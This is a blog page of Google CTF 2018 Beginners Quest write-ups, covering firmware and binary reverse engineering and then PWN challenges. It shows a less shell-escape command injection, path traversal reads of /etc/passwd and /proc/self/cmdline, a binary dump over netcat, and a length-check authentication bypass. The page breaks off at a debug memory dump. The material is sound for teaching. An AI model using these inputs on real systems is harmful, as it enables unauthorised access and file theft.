❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayJack Hacks

Google CTF (2018): Beginners Quest - Reverse Engineering Solutions

21 February 2019 at 00:00

In my previous post β€œGoogle CTF (2018): Beginners Quest - Web Solutions” we covered the web challenges for the 2018 Google CTF, which covered a variety of security issues ranging from topics such as the improper use of client side scripts, and other simple vulnerabilities like cross-site scripting (also known as XSS).

In this post we will cover the Reverse Engineering solutions for the Beginners Quest, which touched on the topics of… well, Reverse Engineering and issues such as hardcoded passwords.

For those that have never done any sort of binary reverse engineering before, then I believe this post will be a great introduction to it. But before you dive into these challenges, I highly suggest you read and familiarize yourself with the x86 Assembly Guide and also read β€œGetting Started with Reverse Engineering” which will be beneficial to your learning.

Firmware

Upon reading the challenge description we learn that we got access to a binary file, and have to see if we can’t find anything. Interesting enough, the description states that it’s β€œnow time to walk around the firmware” which makes me suspect that we need to use binwalk.

First, let’s download the attachment, and extract the file. We should be presented with the following challenge file.

root@kali:~/Google-CTF/Firmware# ls
challenge2.ext4
root@kali:~/Google-CTF/Firmware# file challenge2.ext4 
challenge2.ext4: Linux rev 1.0 ext4 filesystem data, UUID=00ed61e1-1230-4818-bffa-305e19e53758 (extents) (64bit) (large files) (huge files)

Right from the start we notice that the file is of type ext4, which is, as stated by the file output, a Linux filesystem.

So if we were to run binwalk against this file, we should see a lot of Unix paths.

root@kali:~/Google-CTF/Firmware# binwalk challenge2.ext4 | head

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Linux EXT filesystem, rev 1.0, ext4 filesystem data, UUID=00ed61e1-1230-4818-bffa-305e19e519e5
399144        0x61728         Unix path: /lib/x86_64-linux-gnu/ld-2.19.so
405416        0x62FA8         Unix path: /lib/systemd/systemd
406312        0x63328         Unix path: /lib/systemd/systemd-udevd
611240        0x953A8         Unix path: /etc/alternatives/w.1.gz
617000        0x96A28         Unix path: /etc/alternatives/awk.1.gz
617256        0x96B28         Unix path: /etc/alternatives/nawk.1.gz

Awesome, our assumptions were right! So to access this filesystem, we can simply create a new directory and then use the mount command to mount that filesystem to our newly created directory. We should then be able to access all the files via the mount point.

In this case I created a new directory in root called mnt and mounted the filesystem there.

root@kali:~/Google-CTF/Firmware# mkdir /mnt
root@kali:~/Google-CTF/Firmware# mount challenge2.ext4 /mnt
root@kali:~/Google-CTF/Firmware# ls -la /mnt/
total 45
drwxr-xr-x 22 root root  1024 Feb  4 22:12 .
drwxr-xr-x 24 root root  4096 Feb  8 16:09 ..
drwxr-xr-x  2 root root  3072 Jun 22  2018 bin
drwxr-xr-x  2 root root  1024 Jun 22  2018 boot
drwxr-xr-x  4 root root  1024 Jun 22  2018 dev
drwxr-xr-x 52 root root  4096 Jun 22  2018 etc
drwxr-xr-x  2 root root  1024 Jun 22  2018 home
drwxr-xr-x 12 root root  1024 Jun 22  2018 lib
drwxr-xr-x  2 root root  1024 Jun 22  2018 lib64
drwx------  2 root root 12288 Jun 22  2018 lost+found
drwxr-xr-x  2 root root  1024 Jun 22  2018 media
-rw-r--r--  1 root root    20 Jun 22  2018 .mediapc_backdoor_password
-rw-r--r--  1 root root    40 Jun 22  2018 .mediapc_backdoor_password.gz
drwxr-xr-x  2 root root  1024 Jun 22  2018 mnt
drwxr-xr-x  2 root root  1024 Jun 22  2018 opt
drwxr-xr-x  2 root root  1024 Jun 22  2018 proc
drwx------  2 root root  1024 Jun 22  2018 root
drwxr-xr-x  4 root root  1024 Jun 22  2018 run
drwxr-xr-x  2 root root  3072 Jun 22  2018 sbin
drwxr-xr-x  2 root root  1024 Jun 22  2018 srv
drwxr-xr-x  2 root root  1024 Jun 22  2018 sys
drwxr-xr-x  2 root root  1024 Jun 22  2018 tmp
drwxr-xr-x 10 root root  1024 Jun 22  2018 usr
drwxr-xr-x  9 root root  1024 Jun 22  2018 var

Great, we can read the files! Right away I see that the .mediapc_backdoor_password file looks interesting! Let’s see what’s inside.

root@kali:~/Google-CTF/Firmware# cat /mnt/.mediapc_backdoor_password
CTF{I_kn0W_tH15_Fs}

There we go, we found our flag! Now before we move on, let’s make sure we unmount this filesystem from our Linux box. We can simply use the umount command against the mount directory.

root@kali:~/Google-CTF/Firmware# umount /mnt
root@kali:~/Google-CTF/Firmware# ls -la /mnt/
total 8
drwxr-xr-x  2 root root 4096 Feb  8 16:09 .
drwxr-xr-x 24 root root 4096 Feb  8 16:09 ..

FLAG: CTF{I_kn0W_tH15_Fs}

Gatekeeper

Upon reading the challenge description we learn that we got access to some sort of remote control service binary from a PC we purchased. Again we notice a slight hint in the description where it states that β€œnothing is the right way around”. I wonder what that might mean… oh well, let’s dig into the binary!

As previously, download the attachment and extract the file. We should then be presented with the following ELF binary.

root@kali:~/Google-CTF/Gatekeeper# ls
gatekeeper
root@kali:~/Google-CTF/Gatekeeper# file gatekeeper 
gatekeeper: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a89e770cbffa17111e4fddb346215ca04e794af2, not stripped

Alright, so I always like to play around with the binary first to see how it functions before I start reverse engineering it. So let’s execute the binary and see what happens.

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper 
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
[ERROR] Login information missing
Usage: ./gatekeeper <username> <password>

Okay, without providing any arugments we get usage instruction which let us know that we need to pass a username and password into the program. Let’s see what happens if we pass in the combination of admin:admin.

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper admin admin
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
 ~> Verifying....
ACCESS DENIED
 ~> Incorrect username

Access Denied… of course. So it seems that we need to find a valid username and password. I’m going to guess that these values are hardcoded.

What we can do to make life easy, and try to go for a quick β€œwin”, is to use a tool like strings against the binary. This in turn will print out all the printable characters from the binary, possibly revealing the username and password!

NOTE: I trimmed some of the output for readability.

root@kali:~/Google-CTF/Gatekeeper# strings ./gatekeeper
---trim---
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
ACCESS DENIED
[ERROR] Login information missing
Usage: %s <username> <password>
 ~> Verifying.
0n3_W4rM
 ~> Incorrect username
zLl1ks_d4m_T0g_I
Correct!
Welcome back!
 ~> Incorrect password
---trim---

Right away we can see all the strings the binary uses, including what seems to be a username and password! I’m going to assume that 0n3_W4rM is the username as it comes first, and the password is zLl1ks_d4m_T0g_I since it follows after.

Let’s test this to see if we are right!

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper 0n3_W4rM zLl1ks_d4m_T0g_I
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
 ~> Verifying.......ACCESS DENIED
 ~> Incorrect password

Okay, we got the right username, but the password for some reason doesn’t work. Alright, it’s time we tear this program apart and dig into it a little bit deeper to see why this password doesn’t work.

Let’s open this binary using IDA. If you don’t have IDA yet, you can download the Free Version of it here.

Using IDA should be pretty self explanatory and I’ll try to explain as best as I can, but if you’d like - you can read the Reverse Engineering with Ida Pro slides by Chris Eagle to get a better idea of how to use it.

Okay, moving on. Once you open the binary up and have it loaded, press Shift+F12 together to open the Strings Window. This window will display all the strings in the binary. Once done, scroll down and find the password that we entered.

Once we find the password, go ahead and double click that password. This will bring us directly to the .rodata segment which is a memory segment utilized for constant data. As you can see, the password characters will be highlighted in yellow.

Since the .rodata memory region for where the password is located is already highlighted, press the x button on your keyboard to cross reference the password. This will bring up a new screen that will show us where this string is used or called from.

By double clicking the cross reference, we should be taken directly into the IDA Graph View, which will show the disassembled application and it’s function calls/flows.

Initially right above and below the password I see a mov instruction that seems to load data from memory at [rbp+dest] and then moves it to the rax register. We then see that the lea or β€œload effective address” instructions loads the password string into the rsi or Source Index register.

Then another mov instruction is called that sets the rdi or Destination Index to that of the rax register which should be the data that was loaded from memory. This then calls the strcmp function against these two strings.

So my question is… what’s it comparing it to? If we scroll up in the Graph View, we will see the following.

Take note that I explain what’s going on in the image. Simply this portion of the program get’s the length of an argument, which in our case is arg[2] or our password, and then allocates data on the heap which is equal to the string length plus 1. The password we passed into the program is then written to the allocated space.

So to give you a better visual representation of what the assembly is doing, I can show you what the the C code for this will look like. It should look like the following:

v1 = strlen(argv[2]);
dest = (char *)malloc(v1 + 1);
strcpy(dest, argv[2]);

First the strlen function is called to get the size of the password (size of the character pointer array) and sets it to a new variable.

You can then see that malloc is being used (both in C and in the dissasembly) to allocate data on the heap for the dest variable, which will be where the password is being stored.

Finally strcpy is called to move the password into the allocated destination buffer.

At the end we see that another mov instruction is called that set’s the memory value located at [rbp+var_8] to 0.

This then jumps to loc_B2A, which is the string reverse function loop.

Simply this is a string reverse function that takes the last character of the password and moves it to the front.

Now there’s one thing that you need to understand about string in C, and that’s that a string is simply an array of character pointers to the characters in memory. This allows for the manipulation of strings as an array because… well because it’s an array!

If you’re confused you can read β€œC Strings (Arrays vs. Pointers)” to better understand it.

The C code for this function will look like the following:

for ( i = val; i < strlen(dest) >> 1; i++)
{
    v2 = dest[i];
    dest[i] = dest[strlen(dest) -i - 1];
    dest[strlen(dest) - i - 1] = v2;
}

As you can see, the rax register stores the string length which is contained in the memory location [rbp+dest]. The shr instruction then simply shifts the bits of the operand destination by 1. This is used as the loop counter, so when the counter is equal to the string length, as we see the cmp instruction doing, then the program will continue execution to the left.

Otherwise it will jump to loc_AC8 and will move the last character of the string to the front, thus reversing it.

Alright, so we know that the password is being reversed. Let’s reverse it ourselves and see if it works.

root@kali:~/Google-CTF/Gatekeeper# echo "zLl1ks_d4m_T0g_I" | rev
I_g0T_m4d_sk1lLz

After getting the reversed password, let’s test it!

root@kali:~/Google-CTF/Gatekeeper# ./gatekeeper 0n3_W4rM I_g0T_m4d_sk1lLz
/===========================================================================\
|               Gatekeeper - Access your PC from everywhere!                |
+===========================================================================+
 ~> Verifying.......Correct!
Welcome back!
CTF{I_g0T_m4d_sk1lLz}

And there we have it! We got our flag!

FLAG: CTF{I_g0T_m4d_sk1lLz}

Closing

The Reverse Engineering challenges were pretty easy to be honest! They weren’t too overly complex if you knew what you were looking at. For those who are struggling with reverse engineering I always suggest looking at the what’s being called via the call to see what functions are being called - this makes it easier to try and understand what’s going on.

If you had trouble understanding the assembly then I suggest you take the Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration by Open Security Training. They have a lot of courses that can help you get started in assembly and reverse engineering.

Also, Malware Unicorn has a great Reverse Engineering 101 workshop that I highly suggest you read!

At the same time I believe that the book, β€œHacking: The Art of Exploitation” and β€œPractical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation” are great books if you want to get started in exploitation and reverse engineering.

With that being said, I hope you all learned something new from this write up! Stay tuned for my next post as we cover the final PWN challenges!

Just note, the PWN challenges will be split up into two separate posts for easier readability.

Thanks for reading!

Google CTF (2018): Beginners Quest - PWN Solutions (1/2)

22 February 2019 at 00:00

In my previous post β€œGoogle CTF (2018): Beginners Quest - Reverse Engineering Solutions”, we covered the reverse engineering solutions for the 2018 Google CTF, which introduced vulnerabilities such as hardcoded data, and also introduced the basics for x86 Assembly.

In this post we will cover the first set of PWN solutions for the Beginners Quest, which touches on topics such as code injection, reverse engineering, buffer overflows, and format string exploits.

Thankfully for us I introduced the basics of x86 Assembly in my previous post via the x86 Assembly Guide. I highly suggest you familiarize yourself with that if you already haven’t since the PWN challenges will require you to have at least some sort of understanding.

Also, if you aren’t familiar with format string exploits, I suggest you go watch LiverOverflows β€œA simple Format String exploit example - bin 0x11” video which covers this vulnerability pretty well.

Once you got some basic understanding of x86 ASM, Buffer Overflows and Format Strings, we can jump right into the challenges!

Moar

Upon reading the challenge description we learn that we got access to the Foobaziner9000 machine. Unfortunately it seems that the computer is complicated, but to assist us it seems to also be serving manual pages through a network service. Once again, the devil is in the details as the description states that β€œeverything you need is in the manual”.

Alright, with that in mind we see that we can access the manual pages service via moar.ctfcompetition.com on port 1337. Let’s use netcat to connect to that service and see what it has to offer.

root@kali:~/Google-CTF# nc moar.ctfcompetition.com 1337
socat(1)                                                              socat(1)

NAME
       socat - Multipurpose relay (SOcket CAT)

SYNOPSIS
       socat [options] <address> <address>
       socat -V
       socat -h[h[h]] | -?[?[?]]
       filan
       procan

DESCRIPTION
       Socat  is  a  command  line based utility that establishes two bidirec-
       tional byte streams  and  transfers  data  between  them.  Because  the
       streams  can be constructed from a large set of different types of data
       sinks and sources (see address types),  and  because  lots  of  address
       options  may be applied to the streams, socat can be used for many dif-
       ferent purposes.

       Filan is a utility  that  prints  information  about  its  active  file
       descriptors  to  stdout.  It  has been written for debugging socat, but
       might be useful for other purposes too. Use the -h option to find  more
 Manual page socat(1) line 1 (press h for help or q to quit)

Okay, so it seems we got a manual page about socat, but don’t let this fool you into thinking that we have to exploit socat, because we don’t!

Right away I notice that the manual page is being printed out by the less function. If we were to look into the manual pages for less, we should find the following in the commands section.

! shell-command

Invokes a shell to run the shell-command given. A percent sign (%) in the command is replaced by the name of the current file. A pound sign (#) is replaced by the name of the previously examined file. β€œ!!” repeats the last shell command. β€œ!” with no shell command simply invokes a shell. On Unix systems, the shell is taken from the environment variable SHELL, or defaults to β€œsh”. On MS-DOS and OS/2 systems, the shell is the normal command processor.

So what this means is that we can type in an exclamation mark (!) followed by a shell command to execute commands on the server.

Let’s see if this is possible! We can try running the ls -la command to list all the files in the current working directory of the server.

 Manual page socat(1) line 1 (press h for help or q to quit)!ls -la
!ls -la
total 76
drwxr-xr-x  21 moar   moar    4096 Oct 24 19:10 .
drwxr-xr-x  21 moar   moar    4096 Oct 24 19:10 ..
-rwxr-xr-x   1 nobody nogroup    0 Oct 24 19:05 .dockerenv
drwxr-xr-x   2 nobody nogroup 4096 Jun 14  2018 bin
drwxr-xr-x   2 nobody nogroup 4096 Apr 12  2016 boot
drwxr-xr-x   4 nobody nogroup 4096 Oct 24 19:05 dev
drwxr-xr-x  44 nobody nogroup 4096 Oct 24 19:05 etc
drwxr-xr-x   3 nobody nogroup 4096 Jun 14  2018 home
drwxr-xr-x   8 nobody nogroup 4096 Sep 13  2015 lib
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 lib64
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 media
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 mnt
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 opt
dr-xr-xr-x 111 nobody nogroup    0 Feb  9 02:16 proc
drwx------   2 nobody nogroup 4096 Apr 17  2018 root
drwxr-xr-x   5 nobody nogroup 4096 Apr 17  2018 run
drwxr-xr-x   2 nobody nogroup 4096 Apr 27  2018 sbin
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 srv
drwxr-xr-x   2 nobody nogroup 4096 Feb  5  2016 sys
drwxrwxrwt   2 moar   moar      40 Feb  9 02:16 tmp
drwxr-xr-x  10 nobody nogroup 4096 Apr 17  2018 usr
drwxr-xr-x  11 nobody nogroup 4096 Apr 17  2018 var

Awesome, it worked! So we found our command injection. Let’s see what’s in the home folder.

!ls -la /home
total 12
drwxr-xr-x  3 nobody nogroup 4096 Jun 14  2018 .
drwxr-xr-x 21 moar   moar    4096 Oct 24 19:10 ..
drwxr-xr-x  2 nobody nogroup 4096 Jun 29  2018 moar
!done  (press RETURN)!ls -la /home/moar

!ls -la /home/moar
total 24
drwxr-xr-x 2 nobody nogroup 4096 Jun 29  2018 .
drwxr-xr-x 3 nobody nogroup 4096 Jun 14  2018 ..
-rw-r--r-- 1 nobody nogroup  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 nobody nogroup 3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 nobody nogroup  655 May 16  2017 .profile
-r-xr-xr-x 1 nobody nogroup  695 Jun 26  2018 disable_dmz.sh

The disable_dmz.sh file looks interesting, let’s read it and find out what’s inside!

!done  (press RETURN)!cat /home/moar/disable_dmz.sh

!cat /home/moar/disable_dmz.sh
#!/bin/sh

# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

echo 'Disabling DMZ using password CTF{SOmething-CATastr0phic}'
echo CTF{SOmething-CATastr0phic} > /dev/dmz

And just like that we found the flag, an easy start!

FLAG: CTF{SOmething-CATastr0phic}

Admin UI

Upon reading the challenge description we learn that after compromising the Foobaziner9000 we were able to remove it from the DMZ. This gave us access to a new device which seems to be a smart home temperature control unit. Fortunately for us it seems that the management interface looks to be filled with bugs, hence all the talk on the dark net.

Alright, knowing that there might be a few bugs in the interface, let’s connect to the service provided to us via netcat.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

Right from the start we see that we have three choices. The Service access option looks promising, let’s see what it does.

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
admin
Incorrect, the authorities have been informed!

Okay, so it seems that we need a valid password for the service access. Let’s leave that for later and try the second option to read the patch notes.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
Version0.2
# Release 0.2
 - Updated library X to version 0.Y
 - Fixed path traversal bug
 - Improved the UX

Upon reading the patch notes, we can see this golden piece of information: Fixed path traversal bug. For those unfamiliar with path traversals it’s simply a vulnerability that allows you to access files and directories stored outside the current folder.

Unfortunately, it seems to have been patched, but that doesn’t mean we shouldn’t attempt to exploit it. Let’s see if we can read the /etc/passwd/ file.

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
user:x:1337:1337::/home/user:

Awesome! So the vulnerability wasn’t properly patched and we can read files on the system. Unfortunately for us, we’re kind of blind here as we don’t know where the other files on the system might be, or what they might be called.

But, we have a secret weapon! Since we’re connecting to a running service and can read files, we can try to read the proc filesystem which provides an interface to kernel data structures. It is commonly mounted at /proc and can actually reveal a lot about the current process that’s running.

If we look into the proc manual pages, we can find the following in the β€œfiles and directories” portion.

/proc/[pid]/cmdline

This read-only file holds the complete command line for the process, unless the process is a zombie. In the latter case, there is nothing in this file: that is, a read on this file will return 0 characters. The command-line arguments appear in this file as a set of strings separated by null bytes (β€˜\0’), with a further null byte after the last string.

By reading this file, we should be able to see what the name of the executable is and should also see the location that it’s being run from. If we find that out, we can then use the path traversal vulnerability to read the binary and dump it’s contents to our local machine, which can then be reverse engineered.

Also note that we need to know the pid of the service. Thankfully for us, instead of using a pid we can just enter self which should provide us the currently running binary’s pid without us having to guess.

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../../../../../../../proc/self/cmdline
./main

Great, we can see that the binary is called main. Knowing this, let’s go ahead and dump the binary onto our local machine with the following command.

root@kali:~/Google-CTF/Admin UI# echo -e "2\n../main" | nc mngmnt-iface.ctfcompetition.com 1337 >> main.bin

Now that we have the binary file on our machine, let’s open it up in IDA and see if we can’t find the password for the service access.

Once the binary is loaded, press Shift+F12 in IDA to open the strings window and let’s find the β€œPlease enter the backdoo^Wservice password:” string.

Once we find the string, double click it, and in the .rodata section press x to get the cross reference for where this string is being called from.

If done properly, you should see the following:

Right away I notice that after the string is called via the puts function, the lea or β€œload effective address” instruction is called to load the _ZL9FLAG_FILE into the rdi or the Destination Index register.

Okay, this is simple. It seems that the application loads the flag from a file on the disk and uses that as the first password. Since the flag is loaded from disk, let’s see if we can’t read the flag using our path traversal vulnerability.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../flag
CTF{I_luv_buggy_sOFtware}

Easy, we found the flag!

FLAG: CTF{I_luv_buggy_sOFtware}

Admin UI 2

This portion of the challenge is the continuation from Admin UI. Upon reading the description we learn that the first flag we got was a dud, but there seems to be a password somewhere in the binary file. Reversing the binary should give us the access we need.

Aright, so as always, let’s test the binary to see what happens after we enter the password. This should give us the baseline of what to look for in the binary once we start reverse engineering it.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
admin
Access denied

We can clearly see that the first password worked, but then we needed a second password for 2FA. Knowing this, let’s dig back into the binary and return to where we previously found the flag file.

We need to find where the second login occurs. Successful authentication via the fist password would take the flow pointed out by the green arrow. So let’s scroll down the graph, you should then be able to spot the secondary login function.

From here, double click the _Z15secondary_loginv function. This will jump us over to that functions Graph View.

Alright looking into the secondary password function, we can see that the scanf function is called which accepts 128 bytes of data - hence %127s. This scanf function grabs our password input and stores it in a variable called password.

It then creates a new variable and assigns it the length of the entered password via the strlen function.

The C code for this section would look like the following:

char password[128];
size_t l;

puts("Two factor authentication required !");
puts("Please enter secret secondary password:");
scanf("%127s", password);
l = strlen(password);

Okay, so it accepts are password input, but what does it do with our password? Looking a little lower in the Graph View, we see the following.

We can see that variables are set up for a loop function, hence the cmp instruction at the top checking if the loop is completed. If the loop is done, it jumps to loc_414144D6.

If the loop is not done, it does the following. The application loads the password input via the lea or β€œload effective address” instruction, grabs a character from the password via the index specified by the rax register which is loaded from the counter [rbp+i] by the mov instruction.

This character from the password is then xored by the hexadecimal C7. Once xored, the xored character replaces the previous character at the specified index. The add instruction then increments the loop counter at [rbp+i] and jumps to loc_4141449F which then runs the cmp instruction to see if the loop as finished.

To help you visualize what’s going on in C, we’ll be adding on to the previous code we built. The for loop and xor should look like the following:

char password[128];
size_t l;
size_t i;

puts("Two factor authentication required !");
puts("Please enter secret secondary password:");
scanf("%127s", password);
l = strlen(password);
for (i = 0LL; i < l; ++i)
   password[i] ^= 0xC7u;

Once the loop is completed the code jumps over to loc_414144D6 which carries out a cmp instruction.

Now, before we go any further, take a really good look at this! Notice how after the XOR operation completes, there is specifically one compare operation that takes place.

This is a bug, the cmp instruction basically just checks if the password length in [rbp+l] is equal to 23h or 35 in decimal!

That means, that any password that’s 35 bytes long will work and pass the authorization check!

Let’s test this theory!

root@kali:~/Google-CTF/Admin UI# perl -e 'print "A"x35'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Authenticated
> 

Hurrah, we found an authorization bypass! This is great… but we need to find the flag. Let’s look back into the binary where we left off.

Notice that the compare function is comparing our xored password with _ZL4FLAG, which is our flag! Even though it’s only checking the length, we want to extract the flag.

So before we go and extract the flag, let’s see how the C code for this part of the application will look like. It should look like the following:

bool v0;
char password[128];
size_t l;
size_t i;

puts("Two factor authentication required !");
puts("Please enter secret secondary password:");
scanf("%127s", password);
l = strlen(password);
for (i = 0LL; i < l; ++i)
   password[i] ^= 0xC7u
v0 = 0;
if (l == 35)
{
   *(_QWORD *)password = *(_QWORD *)FLAG;
   *(_QWORD *)password[8] = *(_QWORD *)FLAG[8];
   *(_QWORD *)password[16] = *(_QWORD *)FLAG[16];
   *(_QWORD *)password[24] = *(_QWORD *)FLAG[24];
   *(_QWORD *)password[32] = *(_QWORD *)FLAG[32];
   password[34] = FLAG[34];
   if (password)
      v0 = 1;
}
if (!v0)
{
   puts("Access denied.")
   exit(1);
}
puts("Authenticated");

Great, knowing that, let’s xor our first flag with hex C7 to get the second flag. We can extract the bytes used for xoring by just searching the Hex View for the flag file.

We can then write a simple Python program that will do all the work for us and print our xored flag.

flag = """
84 93 81 BC 93 B0 A8 98  97 A6 B4 94 B0 A8 B5 83
BD 98 85 A2 B3 B3 A2 B5  98 B3 AF F3 A9 98 F6 98
AC F8 BA
"""

flag = bytearray(flag.replace(" ", "").replace("\n", "").decode("hex"))
output = ""
for ch in flag:
	output += chr(ch ^ 0xC7)

print output

Executing the script should give us the following output.

root@kali:~/Google-CTF/Admin UI# python xor.py 
CTF{Two_PasSworDz_Better_th4n_1_k?}

Awesome, so it seems we got our second flag! Let’s just test this and make sure that it works!

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
CTF{Two_PasSworDz_Better_th4n_1_k?}
Authenticated
>

It works, that’s the correct flag!

FLAG: CTF{Two_PasSworDz_Better_th4n_1_k?}

Admin UI 3

Upon reading the challenge description we learn that the code quality for this application is horrible and that the Q/A is just bad all around. We also learn that they choose to measure their temperature in β€œKevins” rather then β€œKelvins”. One thing that really stands out to us is the following comment that we can bet that β€œthey can’t handle their memory properly”, which hints of a memory corruption issue.

Okay, so let’s see if we can’t find a buffer overflow or something in the application once authenticated.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
CTF{Two_PasSworDz_Better_th4n_1_k?}
Authenticated
> ls
Unknown command 'ls'
> id
Unknown command 'id'
> whoami
Unknown command 'whoami'

Hmm… nothing seems to work. Let’s look back into the binary via IDA and see if we can’t find any commands that can help us.

Once back in IDA let’s look for the string β€œAuthenticated” and follow the cross references. We should then be presented with the following.

Let’s double click on the _Z12command_linev call to see it’s graph view.

Right from the start we can spot two commands that we can run: quit and version.

> version
Version 0.3
> quit
Bye!
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

But these don’t provide us with much… so let’s look deeper into the graph and see what else we can find.

Right below the version command we spot three more commands: shell, echo and debug. All of these are very interesting, especially the shell command. Let’s see what they do.

> shell
Security made us disable the shell, sorry!
> echo test
test
> debug
Debug data dump:
 pid=1 cmds executed=0x41616134->2 Mappings:
00400000-00401000 r-xp 00000000 08:01 534875                             /home/user/main
41414000-41415000 r-xp 00014000 08:01 534875                             /home/user/main
41615000-41616000 r--p 00015000 08:01 534875                             /home/user/main
41616000-41617000 rw-p 00016000 08:01 534875                             /home/user/main
42748000-4277a000 rw-p 00000000 00:00 0                                  [heap]
7f6cddba3000-7f6cddd63000 r-xp 00000000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddd63000-7f6cddf63000 ---p 001c0000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddf63000-7f6cddf67000 r--p 001c0000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddf67000-7f6cddf69000 rw-p 001c4000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddf69000-7f6cddf6d000 rw-p 00000000 00:00 0
7f6cddf6d000-7f6cddf83000 r-xp 00000000 08:01 537808                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f6cddf83000-7f6cde182000 ---p 00016000 08:01 537808                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f6cde182000-7f6cde183000 rw-p 00015000 08:01 537808                     /lib/x86_64-linux-gnu/libgcc_s.so.1
